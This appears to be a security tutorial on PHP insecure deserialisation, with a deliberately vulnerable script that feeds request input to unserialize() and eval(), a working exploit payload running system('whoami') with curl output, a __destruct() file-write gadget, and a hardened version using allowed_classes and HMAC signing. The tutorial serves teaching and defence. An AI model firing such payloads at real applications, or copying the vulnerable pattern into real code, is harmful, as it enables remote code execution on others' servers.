# PHP deserialisation

## Introduction

First, the terms. Serialisation converts an in-memory object from an object-oriented language such as Java, Python or PHP into a byte or text representation that can be stored or sent over the network. Deserialisation is the reverse: it rebuilds ordinary objects from serialised data read from a file or from the network.

When the serialised data comes from an untrusted source, an attacker can tamper with it to change the application's logic, cause a denial of service, or execute arbitrary code at the moment it is deserialised.

## Proof of Concept

When you control a serialised string that is passed to `unserialize()`, you control the properties of the object it creates. PHP does not call `__construct()` while unserialising, but it does call other magic methods automatically: **\_\_wakeup()** as soon as the object has been rebuilt, and **\_\_destruct()** when the last reference to it goes away. If one of those methods uses a property as a sink (an `eval()`, a file write, a database query), you hijack the application's control flow without the application ever calling a method on your object.
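The following is an added example, not code from the original page: it shows the `__destruct()` variant of the same idea, since the PoC below only exercises `__wakeup()`. `LogBuffer` is a hypothetical application class that flushes a buffer to a log file when the object is destroyed; the file path and content both live in properties, so a serialised string that sets them becomes an arbitrary file write. The target path under `sys_get_temp_dir()` and the file content are assumptions chosen so the demo is harmless.

```php
<?php
// Added example (not from the original page): a __destruct() gadget.
// LogBuffer is a hypothetical application class that flushes a buffer to a
// log file when the object is destroyed. The request handler never calls
// __destruct(); PHP does, so an attacker who controls the serialised
// string turns it into a file write with a path and content of their choice.
class LogBuffer
{
    public $logfile;
    public $buffer;

    public function __construct(string $logfile = '/tmp/app.log')
    {
        $this->logfile = $logfile;
        $this->buffer  = '';
    }

    public function __destruct()
    {
        // The sink: both arguments come from object properties.
        file_put_contents($this->logfile, $this->buffer, FILE_APPEND);
    }
}

// What the attacker sends, written by hand in PHP's serialisation format
// (O:<len>:"<class>":<n>:{<properties>}). unserialize() never calls
// __construct(), so the default log path is irrelevant: the properties in
// the string are the properties the object gets. Lengths are byte counts.
$target  = sys_get_temp_dir() . '/deserialisation_demo.txt';  // assumption: stands in for e.g. a webroot path
$content = "written by __destruct()\n";                        // assumption: stands in for a webshell
$payload = sprintf(
    'O:9:"LogBuffer":2:{s:7:"logfile";s:%d:"%s";s:6:"buffer";s:%d:"%s";}',
    strlen($target), $target, strlen($content), $content
);

@unlink($target);                    // start clean so the demo is unambiguous

$obj = unserialize($payload);        // object rebuilt; LogBuffer has no __wakeup(), so nothing has run yet
var_dump(file_exists($target));      // still absent at this point

unset($obj);                         // last reference dropped -> __destruct() -> file write
var_dump(file_exists($target));      // now present, without any explicit call into LogBuffer
echo file_get_contents($target);
```

Run it with `php gadget.php`. The destructor would equally fire at script shutdown if `$obj` were never unset, which is why `__destruct()` gadgets work even when the application discards the unserialised value immediately.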

In this proof of concept, the vulnerable script reads a serialised string from the request parameter `r` (via `$_REQUEST`, so GET or POST both work), unserialises it and, if the result is an array, prints its first two values. The class `PHPObjectInjection` defines `__wakeup()`, which passes the `inject` property to `eval()`. An attacker can therefore send a serialised `PHPObjectInjection` object whose `inject` property holds PHP code of their choosing: `unserialize()` creates the object and calls `__wakeup()` before the script reaches the `is_array()` check, so the code runs regardless of what the script does with the return value.

**Vulnerable code**:

```php
<?php
class PHPObjectInjection
{
    public $inject;

    function __construct()
    {
    }

    // Called automatically by unserialize() right after the object is rebuilt:
    // whatever the attacker put in $inject is handed straight to eval().
    function __wakeup()
    {
        if (isset($this->inject)) {
            eval($this->inject);
        }
    }
}

if (isset($_REQUEST['r'])) {
    $var1 = unserialize($_REQUEST['r']);   // untrusted input passed to unserialize(): the bug
    if (is_array($var1)) {
        echo "<br/>" . $var1[0] . " - " . $var1[1];
    }
} else {
    echo ""; # nothing happens here
}
?>
```

Serve it with PHP's built-in web server:

```bash
php -S localhost:8080 vuln.php
```

**Exploit** :

```php
<?php
// The attacker only needs the class name and the property name: the
// methods live on the server, so none are defined here.
class PHPObjectInjection
{
    public $inject = "system('whoami');";
}

echo urlencode(serialize(array("vul", "nerable")));   # Basic serialised data (intended use)
echo "\n";
echo urlencode(serialize(new PHPObjectInjection));     # Command execution via __wakeup()
?>
```

```bash
php exploit.php
# Intended use
a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D 
# Malicious use
O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
```

**Result**:

As shown below, the first request is the intended use and prints the two array elements. The second sends the malicious object instead: `unserialize()` rebuilds it, `__wakeup()` passes `system('whoami');` to `eval()`, and the output `kali` is the account running the PHP built-in server. The `is_array()` branch is never taken for the object, so the only output is what `system()` printed. Nothing in the script referenced the `inject` property or called a method on the object; defining the class and feeding untrusted input to `unserialize()` was enough. Note that the attacker has to know the class and property names, which in real targets come from the application's own code or the libraries it loads.

```bash
# Intended use: the array is unserialised and its two elements are printed
curl "http://localhost:8080/?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D"
vul - nerable
# Malicious use: __wakeup() runs eval("system('whoami');") and the user running php -S is printed
curl "http://localhost:8080/?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D"
kali
```
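The following is an added example, not code from the original page: the PoC handler rewritten so that attacker-supplied data can no longer instantiate classes, fed with the page's two payloads (URL-decoded). `PHPObjectInjection` here is a stand-in for the page's class whose `__wakeup()` only prints a marker, so the demo is harmless; `SECRET`, `sign()`, `safe_unserialize()` and `verify_and_unserialize()` are names chosen for this example and are not part of the original code.

```php
<?php
// Added example, not part of the original page: the vulnerable handler from
// the PoC hardened. PHPObjectInjection is a stand-in for the page's class;
// its __wakeup() only prints a marker instead of calling eval().
class PHPObjectInjection
{
    public $inject;

    public function __wakeup()
    {
        echo "__wakeup() ran with: {$this->inject}\n";
    }
}

// Assumption: a per-deployment secret loaded from the environment, never from the request.
const SECRET = 'replace-with-a-random-key-from-the-environment';

// 1. Never let unserialize() build objects from untrusted input (PHP >= 7.0).
//    allowed_classes => false turns every object into __PHP_Incomplete_Class,
//    which has no __wakeup()/__destruct() to trigger; arrays and scalars still work.
function safe_unserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// 2. If objects really must cross a trust boundary, sign the blob server-side and
//    reject anything whose HMAC does not verify before unserialize() ever sees it.
function sign(string $data): string
{
    return hash_hmac('sha256', $data, SECRET) . '.' . $data;
}

function verify_and_unserialize(string $signed)
{
    $parts = explode('.', $signed, 2);     // hex MAC never contains '.', the payload might
    if (count($parts) !== 2) {
        return false;
    }
    [$mac, $data] = $parts;
    if (!hash_equals(hash_hmac('sha256', $data, SECRET), $mac)) {
        return false;                      // forged or tampered: never reaches unserialize()
    }
    return unserialize($data, ['allowed_classes' => ['PHPObjectInjection']]);
}

// The page's two payloads, URL-decoded.
$benign    = 'a:2:{i:0;s:3:"vul";i:1;s:7:"nerable";}';
$malicious = 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system(\'whoami\');";}';

$var1 = safe_unserialize($benign);
if (is_array($var1)) {
    echo $var1[0] . ' - ' . $var1[1] . "\n";   // intended use keeps working
}

$obj = safe_unserialize($malicious);
var_dump(get_class($obj));                     // __PHP_Incomplete_Class: __wakeup() never ran

var_dump(verify_and_unserialize($malicious));  // rejected: no valid signature
var_dump(verify_and_unserialize(sign($benign))); // accepted only because this server signed it
```

The ordering matters: the signature check runs on the raw string, before `unserialize()`, because by the time the object exists the magic methods have already fired. Where the data is only ever arrays and scalars, the simplest fix is to drop `unserialize()` altogether and exchange JSON with `json_encode()`/`json_decode()`, which cannot instantiate application classes at all.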

## References

* [PHP deserialisation exploits \[PayloadsAllTheThings\]](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md)
* [PHP Object Injection \[OWASP\]](https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection)
* [Exploiting PHP deserialization \[Medium\]](https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a)
* [Deserialization Cheat Sheet \[OWASP\]](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
* [Exploiting insecure deserialization vulnerabilities \[PortSwigger\]](https://portswigger.net/web-security/deserialization/exploiting)
* [Magic methods \[PHP manual\]](https://www.php.net/manual/en/language.oop5.magic.php#object.wakeup)
* [What is Phar Deserialization \[SonarSource\]](https://www.sonarsource.com/blog/new-php-exploitation-technique/)

